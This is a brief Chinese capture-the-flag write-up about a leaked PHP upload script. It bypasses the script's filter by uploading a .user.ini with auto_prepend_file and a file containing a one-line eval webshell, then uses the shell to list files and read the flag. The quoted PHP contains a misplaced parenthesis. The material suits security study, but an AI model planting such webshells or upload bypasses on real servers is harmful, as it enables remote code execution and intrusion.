upload.php.bak源码泄露了
审计一下
点击查看代码
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){
die("error file zise");
}
if (strlen($filename)>9){
die("error file name");
}
if(strlen($ext_suffix)>3){
die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){
die("error suffix");
}
if(preg_match("/php/i"),$filename)){
die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){
echo "文件上传成功!";
}else{
echo "文件上传失败!";
}
?>
可以上传user.ini文件 文件内容为auto_prepend_file=1.txt
这样所有文件就会自动包含1.txt的内容了
之后我们上传1.txt,往里面写入一句话木马
点击查看代码
<?php eval($_POST['a']);
我们尝试a=print_r(glob("."));看看命令能否被执行
可以看到执行成功并将所有文件暴露了出来
接下来
show_source("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");
查看该文件的代码
拿到flag
